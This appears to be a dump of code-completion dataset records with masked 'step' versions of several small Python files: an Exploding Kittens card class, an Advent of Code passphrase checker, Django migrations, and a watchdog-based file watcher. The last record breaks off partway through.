hand.remove(played_card)\n player.hand.append(card_stolen)\n return True, False\n\n def skip(self, attack, pick):\n print('Your turn has been skipped')\n pick = False\n return pick, attack\n\n def attack(self, attack, pick):\n attack = True\n pick = False\n return pick, attack\n\n def see_future(self, decker):\n if decker.cards_left() < 3:\n for i in range(decker.cards_left()):\n card = decker.draw_top(i)\n print(card.type)\n decker.add_card(card, i)\n else:\n for i in range(3):\n card = decker.draw_top(i)\n print(card.type)\n decker.add_card(card, i)\n",
"step-5": "import loops\r\n\r\nclass Card():\r\n #to make a card you must type Card(\"Name of Card\")\r\n def check_cat(self,string):\r\n if \"Cat\" in string:\r\n return True\r\n return False\r\n def __init__(self,string):\r\n self.type = string\r\n self.cat = self.check_cat(self.type)\r\n # self.image_back = image_back\r\n # self.image_front = image_front\r\n def __str__(self):\r\n return self.type\r\n #negates any action, except a defuse\r\n def nope(self,arr_players,cards,turn_order):\r\n count = 0\r\n for i,k in enumerate(arr_players):\r\n if i != turn_order:\r\n for i,k in enumerate(k.hand):\r\n if k == cards[11]:\r\n count += 1\r\n if count > 0:\r\n print(\"A nope card can be played\")\r\n decision = input(\"Would a player like to play a nope card? (y/n)\")\r\n while decision != \"y\" and decision != \"n\":\r\n decision = input(\"Would a player like to play a nope card? (y/n) \")\r\n if decision == \"n\":\r\n return False\r\n elif decision == 'y':\r\n for i,k in enumerate(arr_players):\r\n print(str(i)+\"-\"+k.name)\r\n player = int(input(\"Which player would like to play the nope card?\"))\r\n while (player < 0 or player > len(arr_players)) and players == turn_order:\r\n player = int*input(\"Which player would like to play the nope card?\")\r\n arr_players[player].hand.remove(cards[11])\r\n return True\r\n return False\r\n\r\n #makes another player choose a card to give away to current player\r\n def favor(self,hand,player,arr_players,played_card):\r\n recipient = loops.phase_of_taking(arr_players,player)\r\n card_taken = arr_players[recipient].hand.pop(loops.give_card(arr_players,recipient))\r\n print(card_taken,\"was given\")\r\n recipient.hand.remove(card_taken)\r\n player.hand.append(card_taken)\r\n return True,False\r\n #allows a player to steal a card from another player\r\n def steal(self,hand,player,arr_players,played_card):\r\n recipient = loops.phase_of_taking(arr_players,player)\r\n card_stolen = arr_players[recipient].hand.pop(loops.card_stealing(arr_players,recipient))\r\n print(\"You stole\",card_stolen.type)\r\n hand.remove(played_card)\r\n player.hand.append(card_stolen)\r\n return True,False\r\n #makes the player skip a turn\r\n def skip(self,attack,pick):\r\n print(\"Your turn has been skipped\")\r\n pick = False\r\n return pick,attack\r\n #the player makes the next person take his turn as well, forcing them to take 2 turns\r\n def attack(self,attack,pick):\r\n attack = True\r\n pick = False\r\n return pick,attack\r\n #see future draws the top three cards, prints the three cards, and puts the cards back in the correct positions\r\n def see_future(self,decker):\r\n if decker.cards_left() < 3:\r\n for i in range(decker.cards_left()):\r\n card = decker.draw_top(i)\r\n print(card.type)\r\n decker.add_card(card,i)\r\n else:\r\n for i in range(3):\r\n card = decker.draw_top(i)\r\n print(card.type)\r\n decker.add_card(card,i) ",
"step-ids": [
4,
6,
8,
10,
12
]
}
|
[
4,
6,
8,
10,
12
] |
# Advent of Code: Day 4
"""A new system policy has been put in place that requires all accounts to
use a passphrase instead of simply a password. A passphrase consists of a
series of words (lowercase letters) separated by spaces.
To ensure security, a valid passphrase must contain no duplicate words.
"""
def valid(filename):
f = open(filename, 'r')
lines = f.readlines()
f.close()
result = 0
for line in lines:
split = line.rstrip().split(' ')
if len(split) == len(set(split)):
result += 1
return result
"""For added security, yet another system policy has been put in place.
Now, a valid passphrase must contain no two words that are anagrams of
each other - that is, a passphrase is invalid if any word's letters can
be rearranged to form any other word in the passphrase.
"""
def valid_anagram(filename):
f = open(filename, 'r')
lines = f.readlines()
f.close()
result = len(lines)
for line in lines:
split = line.rstrip().split(' ')
split = [sorted(s) for s in split]
for word in split:
if split.count(word) > 1:
result -= 1
break
return result
if __name__ == '__main__':
print(valid('day4-input.txt'))
print(valid_anagram('day4-input.txt'))
|
normal
|
{
"blob_id": "7dce240a891e807b1f5251a09a69368f4e513973",
"index": 4472,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef valid_anagram(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n result = len(lines)\n for line in lines:\n split = line.rstrip().split(' ')\n split = [sorted(s) for s in split]\n for word in split:\n if split.count(word) > 1:\n result -= 1\n break\n return result\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef valid(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n result = 0\n for line in lines:\n split = line.rstrip().split(' ')\n if len(split) == len(set(split)):\n result += 1\n return result\n\n\n<mask token>\n\n\ndef valid_anagram(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n result = len(lines)\n for line in lines:\n split = line.rstrip().split(' ')\n split = [sorted(s) for s in split]\n for word in split:\n if split.count(word) > 1:\n result -= 1\n break\n return result\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef valid(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n result = 0\n for line in lines:\n split = line.rstrip().split(' ')\n if len(split) == len(set(split)):\n result += 1\n return result\n\n\n<mask token>\n\n\ndef valid_anagram(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n result = len(lines)\n for line in lines:\n split = line.rstrip().split(' ')\n split = [sorted(s) for s in split]\n for word in split:\n if split.count(word) > 1:\n result -= 1\n break\n return result\n\n\nif __name__ == '__main__':\n print(valid('day4-input.txt'))\n print(valid_anagram('day4-input.txt'))\n",
"step-5": "# Advent of Code: Day 4\n\n\"\"\"A new system policy has been put in place that requires all accounts to \nuse a passphrase instead of simply a password. A passphrase consists of a \nseries of words (lowercase letters) separated by spaces.\n\nTo ensure security, a valid passphrase must contain no duplicate words.\n\n\"\"\"\ndef valid(filename):\n\tf = open(filename, 'r')\n\tlines = f.readlines()\n\tf.close()\n\t\n\tresult = 0\n\tfor line in lines:\n\t\tsplit = line.rstrip().split(' ')\n\t\tif len(split) == len(set(split)):\n\t\t\tresult += 1\t\t\n\t\t\t\n\treturn result\n\t\n\n\"\"\"For added security, yet another system policy has been put in place. \nNow, a valid passphrase must contain no two words that are anagrams of \neach other - that is, a passphrase is invalid if any word's letters can \nbe rearranged to form any other word in the passphrase.\n\n\"\"\"\t\t\ndef valid_anagram(filename):\n\tf = open(filename, 'r')\n\tlines = f.readlines()\n\tf.close()\n\t\n\tresult = len(lines)\n\tfor line in lines:\n\t\tsplit = line.rstrip().split(' ')\n\t\tsplit = [sorted(s) for s in split]\n\t\tfor word in split:\n\t\t\tif split.count(word) > 1:\n\t\t\t\tresult -= 1\n\t\t\t\tbreak\t\t\n\t\t\t\n\treturn result\t\n\t\n\t\nif __name__ == '__main__':\n\tprint(valid('day4-input.txt'))\n\tprint(valid_anagram('day4-input.txt'))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 2.0.7 on 2018-09-27 13:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('education', '0005_auto_20180927_1041'),
]
operations = [
migrations.RemoveField(
model_name='educationgroup',
name='students',
),
migrations.AddField(
model_name='student',
name='education_groups',
field=models.ManyToManyField(blank=True, to='education.EducationGroup', verbose_name='Education Groups'),
),
]
|
normal
|
{
"blob_id": "8ff7ace102b781b35fff0671e2c606bf662e2767",
"index": 9851,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('education', '0005_auto_20180927_1041')]\n operations = [migrations.RemoveField(model_name='educationgroup', name=\n 'students'), migrations.AddField(model_name='student', name=\n 'education_groups', field=models.ManyToManyField(blank=True, to=\n 'education.EducationGroup', verbose_name='Education Groups'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('education', '0005_auto_20180927_1041')]\n operations = [migrations.RemoveField(model_name='educationgroup', name=\n 'students'), migrations.AddField(model_name='student', name=\n 'education_groups', field=models.ManyToManyField(blank=True, to=\n 'education.EducationGroup', verbose_name='Education Groups'))]\n",
"step-5": "# Generated by Django 2.0.7 on 2018-09-27 13:40\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('education', '0005_auto_20180927_1041'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='educationgroup',\n name='students',\n ),\n migrations.AddField(\n model_name='student',\n name='education_groups',\n field=models.ManyToManyField(blank=True, to='education.EducationGroup', verbose_name='Education Groups'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MachopWatchCommand(MachopProcess):
class MachopHandler(PatternMatchingEventHandler):
""" watcher for a file system event """
def on_modified(self, event):
if event.is_directory:
return
source = event.src_path
self._watcher.modified(source)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def modified(self, eventsrc):
"""
@@@ needs proper event handling for actions!!!
"""
if not self.has_changed(eventsrc):
return
matched = False
for pattern in self.globs:
if fnmatch.fnmatch(eventsrc, pattern):
matched = True
break
if matched:
for action in self.actions:
action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))
self.announce()
def announce(self, nl=False):
log = self.log
msg = 'watching ' + log.yellow(self.watchpath)
for match in self.globs:
msg += ' for [' + log.yellow(match) + ']'
msg += '...'
if nl:
msg += '\n'
log.out(msg)
def run(self):
self.log = MachopLog(self.queue, 'watch')
self.handler = self.MachopHandler(patterns=self.globs)
self.handler._watcher = self
self.observer = Observer()
self.observer.schedule(self.handler, self.watchpath, recursive=True)
self.observer.start()
self.announce(True)
wait_for_interrupt(self.observer)
self.observer.stop()
self.observer.join(3)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MachopWatchCommand(MachopProcess):
class MachopHandler(PatternMatchingEventHandler):
""" watcher for a file system event """
def on_modified(self, event):
if event.is_directory:
return
source = event.src_path
self._watcher.modified(source)
def __init__(self, globs=None, cmds=None, path=None, queue=None):
super(MachopWatchCommand, self).__init__()
recreate = globs, cmds, path, queue
self._safe_process(queue=queue, cfgpath=path, init=recreate)
self.globs = globs if globs else []
self.actions = cmds if cmds else []
self.watchpath = path
self.queue = queue
self.hashmap = {}
self.log = None
<|reserved_special_token_0|>
def modified(self, eventsrc):
"""
@@@ needs proper event handling for actions!!!
"""
if not self.has_changed(eventsrc):
return
matched = False
for pattern in self.globs:
if fnmatch.fnmatch(eventsrc, pattern):
matched = True
break
if matched:
for action in self.actions:
action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))
self.announce()
def announce(self, nl=False):
log = self.log
msg = 'watching ' + log.yellow(self.watchpath)
for match in self.globs:
msg += ' for [' + log.yellow(match) + ']'
msg += '...'
if nl:
msg += '\n'
log.out(msg)
def run(self):
self.log = MachopLog(self.queue, 'watch')
self.handler = self.MachopHandler(patterns=self.globs)
self.handler._watcher = self
self.observer = Observer()
self.observer.schedule(self.handler, self.watchpath, recursive=True)
self.observer.start()
self.announce(True)
wait_for_interrupt(self.observer)
self.observer.stop()
self.observer.join(3)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MachopWatchCommand(MachopProcess):
class MachopHandler(PatternMatchingEventHandler):
""" watcher for a file system event """
def on_modified(self, event):
if event.is_directory:
return
source = event.src_path
self._watcher.modified(source)
def __init__(self, globs=None, cmds=None, path=None, queue=None):
super(MachopWatchCommand, self).__init__()
recreate = globs, cmds, path, queue
self._safe_process(queue=queue, cfgpath=path, init=recreate)
self.globs = globs if globs else []
self.actions = cmds if cmds else []
self.watchpath = path
self.queue = queue
self.hashmap = {}
self.log = None
def set_queue(self, queue):
self.queue = queue
def modified(self, eventsrc):
"""
@@@ needs proper event handling for actions!!!
"""
if not self.has_changed(eventsrc):
return
matched = False
for pattern in self.globs:
if fnmatch.fnmatch(eventsrc, pattern):
matched = True
break
if matched:
for action in self.actions:
action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))
self.announce()
def announce(self, nl=False):
log = self.log
msg = 'watching ' + log.yellow(self.watchpath)
for match in self.globs:
msg += ' for [' + log.yellow(match) + ']'
msg += '...'
if nl:
msg += '\n'
log.out(msg)
def run(self):
self.log = MachopLog(self.queue, 'watch')
self.handler = self.MachopHandler(patterns=self.globs)
self.handler._watcher = self
self.observer = Observer()
self.observer.schedule(self.handler, self.watchpath, recursive=True)
self.observer.start()
self.announce(True)
wait_for_interrupt(self.observer)
self.observer.stop()
self.observer.join(3)
def has_changed(self, key):
hasher = hashlib.md5()
with open(key, 'rb') as modfile:
hasher.update(modfile.read())
xhash = hasher.hexdigest()
if self.hashmap.get(key, '') != xhash:
self.hashmap[key] = xhash
return True
return False
<|reserved_special_token_1|>
import fnmatch
import hashlib
from .mplog import MachopLog
from .utils import MachopProcess, wait_for_interrupt
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
class MachopWatchCommand(MachopProcess):
class MachopHandler(PatternMatchingEventHandler):
""" watcher for a file system event """
def on_modified(self, event):
if event.is_directory:
return
source = event.src_path
self._watcher.modified(source)
def __init__(self, globs=None, cmds=None, path=None, queue=None):
super(MachopWatchCommand, self).__init__()
recreate = globs, cmds, path, queue
self._safe_process(queue=queue, cfgpath=path, init=recreate)
self.globs = globs if globs else []
self.actions = cmds if cmds else []
self.watchpath = path
self.queue = queue
self.hashmap = {}
self.log = None
def set_queue(self, queue):
self.queue = queue
def modified(self, eventsrc):
"""
@@@ needs proper event handling for actions!!!
"""
if not self.has_changed(eventsrc):
return
matched = False
for pattern in self.globs:
if fnmatch.fnmatch(eventsrc, pattern):
matched = True
break
if matched:
for action in self.actions:
action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))
self.announce()
def announce(self, nl=False):
log = self.log
msg = 'watching ' + log.yellow(self.watchpath)
for match in self.globs:
msg += ' for [' + log.yellow(match) + ']'
msg += '...'
if nl:
msg += '\n'
log.out(msg)
def run(self):
self.log = MachopLog(self.queue, 'watch')
self.handler = self.MachopHandler(patterns=self.globs)
self.handler._watcher = self
self.observer = Observer()
self.observer.schedule(self.handler, self.watchpath, recursive=True)
self.observer.start()
self.announce(True)
wait_for_interrupt(self.observer)
self.observer.stop()
self.observer.join(3)
def has_changed(self, key):
hasher = hashlib.md5()
with open(key, 'rb') as modfile:
hasher.update(modfile.read())
xhash = hasher.hexdigest()
if self.hashmap.get(key, '') != xhash:
self.hashmap[key] = xhash
return True
return False
<|reserved_special_token_1|>
import fnmatch
import hashlib
from .mplog import MachopLog
from .utils import MachopProcess, wait_for_interrupt
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
class MachopWatchCommand(MachopProcess):
class MachopHandler(PatternMatchingEventHandler):
""" watcher for a file system event """
def on_modified(self, event):
if event.is_directory:
return
source = event.src_path
self._watcher.modified(source)
def __init__(self, globs=None, cmds=None, path=None, queue=None):
super(MachopWatchCommand, self).__init__()
recreate = (globs, cmds, path, queue)
self._safe_process(queue=queue, cfgpath=path, init=recreate)
self.globs = globs if globs else []
self.actions = cmds if cmds else []
self.watchpath = path
self.queue = queue
self.hashmap = {}
self.log = None
def set_queue(self, queue):
self.queue = queue
def modified(self, eventsrc):
"""
@@@ needs proper event handling for actions!!!
"""
if not self.has_changed(eventsrc):
return
matched = False
for pattern in self.globs:
if fnmatch.fnmatch(eventsrc, pattern):
matched = True
break
if matched:
for action in self.actions:
action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))
self.announce()
def announce(self, nl=False):
log = self.log
msg = "watching " + log.yellow(self.watchpath)
for match in self.globs:
msg += " for [" + log.yellow(match) + "]"
msg += "..."
if nl:
msg += '\n'
log.out(msg)
def run(self):
self.log = MachopLog(self.queue, 'watch')
self.handler = self.MachopHandler(patterns=self.globs)
self.handler._watcher = self
self.observer = Observer()
self.observer.schedule(self.handler, self.watchpath, recursive=True)
self.observer.start()
self.announce(True)
wait_for_interrupt(self.observer)
self.observer.stop()
self.observer.join(3)
def has_changed(self, key):
hasher = hashlib.md5()
with open(key, 'rb') as modfile:
hasher.update(modfile.read())
xhash = hasher.hexdigest()
if self.hashmap.get(key, "") != xhash:
self.hashmap[key] = xhash
return True
return False
|
flexible
|
{
"blob_id": "4e30f0a9b420123c28858aad2a71040dcc952829",
"index": 1391,
"step-1": "<mask token>\n\n\nclass MachopWatchCommand(MachopProcess):\n\n\n class MachopHandler(PatternMatchingEventHandler):\n \"\"\" watcher for a file system event \"\"\"\n\n def on_modified(self, event):\n if event.is_directory:\n return\n source = event.src_path\n self._watcher.modified(source)\n <mask token>\n <mask token>\n\n def modified(self, eventsrc):\n \"\"\"\n @@@ needs proper event handling for actions!!!\n \"\"\"\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()\n\n def announce(self, nl=False):\n log = self.log\n msg = 'watching ' + log.yellow(self.watchpath)\n for match in self.globs:\n msg += ' for [' + log.yellow(match) + ']'\n msg += '...'\n if nl:\n msg += '\\n'\n log.out(msg)\n\n def run(self):\n self.log = MachopLog(self.queue, 'watch')\n self.handler = self.MachopHandler(patterns=self.globs)\n self.handler._watcher = self\n self.observer = Observer()\n self.observer.schedule(self.handler, self.watchpath, recursive=True)\n self.observer.start()\n self.announce(True)\n wait_for_interrupt(self.observer)\n self.observer.stop()\n self.observer.join(3)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass MachopWatchCommand(MachopProcess):\n\n\n class MachopHandler(PatternMatchingEventHandler):\n \"\"\" watcher for a file system event \"\"\"\n\n def on_modified(self, event):\n if event.is_directory:\n return\n source = event.src_path\n self._watcher.modified(source)\n\n def __init__(self, globs=None, cmds=None, path=None, queue=None):\n super(MachopWatchCommand, self).__init__()\n recreate = globs, cmds, path, queue\n self._safe_process(queue=queue, cfgpath=path, init=recreate)\n self.globs = globs if globs else []\n self.actions = cmds if cmds else []\n self.watchpath = path\n self.queue = queue\n self.hashmap = {}\n self.log = None\n <mask token>\n\n def modified(self, eventsrc):\n \"\"\"\n @@@ needs proper event handling for actions!!!\n \"\"\"\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()\n\n def announce(self, nl=False):\n log = self.log\n msg = 'watching ' + log.yellow(self.watchpath)\n for match in self.globs:\n msg += ' for [' + log.yellow(match) + ']'\n msg += '...'\n if nl:\n msg += '\\n'\n log.out(msg)\n\n def run(self):\n self.log = MachopLog(self.queue, 'watch')\n self.handler = self.MachopHandler(patterns=self.globs)\n self.handler._watcher = self\n self.observer = Observer()\n self.observer.schedule(self.handler, self.watchpath, recursive=True)\n self.observer.start()\n self.announce(True)\n wait_for_interrupt(self.observer)\n self.observer.stop()\n self.observer.join(3)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass MachopWatchCommand(MachopProcess):\n\n\n class MachopHandler(PatternMatchingEventHandler):\n \"\"\" watcher for a file system event \"\"\"\n\n def on_modified(self, event):\n if event.is_directory:\n return\n source = event.src_path\n self._watcher.modified(source)\n\n def __init__(self, globs=None, cmds=None, path=None, queue=None):\n super(MachopWatchCommand, self).__init__()\n recreate = globs, cmds, path, queue\n self._safe_process(queue=queue, cfgpath=path, init=recreate)\n self.globs = globs if globs else []\n self.actions = cmds if cmds else []\n self.watchpath = path\n self.queue = queue\n self.hashmap = {}\n self.log = None\n\n def set_queue(self, queue):\n self.queue = queue\n\n def modified(self, eventsrc):\n \"\"\"\n @@@ needs proper event handling for actions!!!\n \"\"\"\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()\n\n def announce(self, nl=False):\n log = self.log\n msg = 'watching ' + log.yellow(self.watchpath)\n for match in self.globs:\n msg += ' for [' + log.yellow(match) + ']'\n msg += '...'\n if nl:\n msg += '\\n'\n log.out(msg)\n\n def run(self):\n self.log = MachopLog(self.queue, 'watch')\n self.handler = self.MachopHandler(patterns=self.globs)\n self.handler._watcher = self\n self.observer = Observer()\n self.observer.schedule(self.handler, self.watchpath, recursive=True)\n self.observer.start()\n self.announce(True)\n wait_for_interrupt(self.observer)\n self.observer.stop()\n self.observer.join(3)\n\n def has_changed(self, key):\n hasher = hashlib.md5()\n with open(key, 'rb') as modfile:\n hasher.update(modfile.read())\n xhash = hasher.hexdigest()\n if self.hashmap.get(key, '') != xhash:\n self.hashmap[key] = xhash\n return True\n return False\n",
"step-4": "import fnmatch\nimport hashlib\nfrom .mplog import MachopLog\nfrom .utils import MachopProcess, wait_for_interrupt\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\n\n\nclass MachopWatchCommand(MachopProcess):\n\n\n class MachopHandler(PatternMatchingEventHandler):\n \"\"\" watcher for a file system event \"\"\"\n\n def on_modified(self, event):\n if event.is_directory:\n return\n source = event.src_path\n self._watcher.modified(source)\n\n def __init__(self, globs=None, cmds=None, path=None, queue=None):\n super(MachopWatchCommand, self).__init__()\n recreate = globs, cmds, path, queue\n self._safe_process(queue=queue, cfgpath=path, init=recreate)\n self.globs = globs if globs else []\n self.actions = cmds if cmds else []\n self.watchpath = path\n self.queue = queue\n self.hashmap = {}\n self.log = None\n\n def set_queue(self, queue):\n self.queue = queue\n\n def modified(self, eventsrc):\n \"\"\"\n @@@ needs proper event handling for actions!!!\n \"\"\"\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()\n\n def announce(self, nl=False):\n log = self.log\n msg = 'watching ' + log.yellow(self.watchpath)\n for match in self.globs:\n msg += ' for [' + log.yellow(match) + ']'\n msg += '...'\n if nl:\n msg += '\\n'\n log.out(msg)\n\n def run(self):\n self.log = MachopLog(self.queue, 'watch')\n self.handler = self.MachopHandler(patterns=self.globs)\n self.handler._watcher = self\n self.observer = Observer()\n self.observer.schedule(self.handler, self.watchpath, recursive=True)\n self.observer.start()\n self.announce(True)\n wait_for_interrupt(self.observer)\n self.observer.stop()\n self.observer.join(3)\n\n def has_changed(self, key):\n hasher = hashlib.md5()\n with open(key, 'rb') as modfile:\n hasher.update(modfile.read())\n xhash = hasher.hexdigest()\n if self.hashmap.get(key, '') != xhash:\n self.hashmap[key] = xhash\n return True\n return False\n",
"step-5": "\nimport fnmatch\nimport hashlib\n\nfrom .mplog import MachopLog\nfrom .utils import MachopProcess, wait_for_interrupt\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\n\n\nclass MachopWatchCommand(MachopProcess):\n\n class MachopHandler(PatternMatchingEventHandler):\n \"\"\" watcher for a file system event \"\"\"\n def on_modified(self, event):\n if event.is_directory:\n return\n source = event.src_path\n self._watcher.modified(source)\n\n def __init__(self, globs=None, cmds=None, path=None, queue=None):\n super(MachopWatchCommand, self).__init__()\n recreate = (globs, cmds, path, queue)\n self._safe_process(queue=queue, cfgpath=path, init=recreate)\n self.globs = globs if globs else []\n self.actions = cmds if cmds else []\n self.watchpath = path\n self.queue = queue\n self.hashmap = {}\n self.log = None\n\n def set_queue(self, queue):\n self.queue = queue\n\n def modified(self, eventsrc):\n \"\"\"\n @@@ needs proper event handling for actions!!!\n \"\"\"\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()\n\n def announce(self, nl=False):\n log = self.log\n msg = \"watching \" + log.yellow(self.watchpath)\n for match in self.globs:\n msg += \" for [\" + log.yellow(match) + \"]\"\n msg += \"...\"\n if nl:\n msg += '\\n'\n log.out(msg)\n\n def run(self):\n self.log = MachopLog(self.queue, 'watch')\n self.handler = self.MachopHandler(patterns=self.globs)\n self.handler._watcher = self\n self.observer = Observer()\n self.observer.schedule(self.handler, self.watchpath, recursive=True)\n self.observer.start()\n self.announce(True)\n wait_for_interrupt(self.observer)\n self.observer.stop()\n self.observer.join(3)\n\n def has_changed(self, key):\n hasher = hashlib.md5()\n with open(key, 'rb') as modfile:\n hasher.update(modfile.read())\n xhash = hasher.hexdigest()\n if self.hashmap.get(key, \"\") != xhash:\n self.hashmap[key] = xhash\n return True\n return False\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-08-04 13:16
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0007_alter_validators_add_error_messages'),
('enterprise', '0002_auto_20160804_1616'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(blank=True, max_length=255, unique=True, verbose_name='Электронная почта')),
('username', models.CharField(db_index=True, max_length=40, unique=True, verbose_name='Идентификатор')),
('created_at', models.DateField(auto_now_add=True, verbose_name='Дата регистрации')),
('is_active', models.BooleanField(default=True, verbose_name='Активен')),
('ip', models.GenericIPAddressField(blank=True, null=True, verbose_name='IP адрес')),
('surname', models.CharField(blank=True, max_length=50, verbose_name='Фамилия')),
('first_name', models.CharField(blank=True, max_length=25, verbose_name='Имя')),
('middle_name', models.CharField(blank=True, max_length=25, verbose_name='Отчество')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('organisation', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='enterprise.Organisation', verbose_name='Сотрудник организации')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'Пользователь',
'verbose_name_plural': 'Пользователи',
},
),
]
|
normal
|
{
"blob_id": "71662ff8c68559bf08e1da7f1a1504bfe842c950",
"index": 7430,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('auth', '0007_alter_validators_add_error_messages'), (\n 'enterprise', '0002_auto_20160804_1616')]\n operations = [migrations.CreateModel(name='User', fields=[('id', models\n .AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('password', models.CharField(max_length=128,\n verbose_name='password')), ('last_login', models.DateTimeField(\n blank=True, null=True, verbose_name='last login')), ('is_superuser',\n models.BooleanField(default=False, help_text=\n 'Designates that this user has all permissions without explicitly assigning them.'\n , verbose_name='superuser status')), ('email', models.EmailField(\n blank=True, max_length=255, unique=True, verbose_name=\n 'Электронная почта')), ('username', models.CharField(db_index=True,\n max_length=40, unique=True, verbose_name='Идентификатор')), (\n 'created_at', models.DateField(auto_now_add=True, verbose_name=\n 'Дата регистрации')), ('is_active', models.BooleanField(default=\n True, verbose_name='Активен')), ('ip', models.GenericIPAddressField\n (blank=True, null=True, verbose_name='IP адрес')), ('surname',\n models.CharField(blank=True, max_length=50, verbose_name='Фамилия')\n ), ('first_name', models.CharField(blank=True, max_length=25,\n verbose_name='Имя')), ('middle_name', models.CharField(blank=True,\n max_length=25, verbose_name='Отчество')), ('groups', models.\n ManyToManyField(blank=True, help_text=\n 'The groups this user belongs to. A user will get all permissions granted to each of their groups.'\n , related_name='user_set', related_query_name='user', to=\n 'auth.Group', verbose_name='groups')), ('organisation', models.\n ForeignKey(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, to='enterprise.Organisation', verbose_name=\n 'Сотрудник организации')), ('user_permissions', models.\n ManyToManyField(blank=True, help_text=\n 'Specific permissions for this user.', related_name='user_set',\n related_query_name='user', to='auth.Permission', verbose_name=\n 'user permissions'))], options={'verbose_name': 'Пользователь',\n 'verbose_name_plural': 'Пользователи'})]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('auth', '0007_alter_validators_add_error_messages'), (\n 'enterprise', '0002_auto_20160804_1616')]\n operations = [migrations.CreateModel(name='User', fields=[('id', models\n .AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('password', models.CharField(max_length=128,\n verbose_name='password')), ('last_login', models.DateTimeField(\n blank=True, null=True, verbose_name='last login')), ('is_superuser',\n models.BooleanField(default=False, help_text=\n 'Designates that this user has all permissions without explicitly assigning them.'\n , verbose_name='superuser status')), ('email', models.EmailField(\n blank=True, max_length=255, unique=True, verbose_name=\n 'Электронная почта')), ('username', models.CharField(db_index=True,\n max_length=40, unique=True, verbose_name='Идентификатор')), (\n 'created_at', 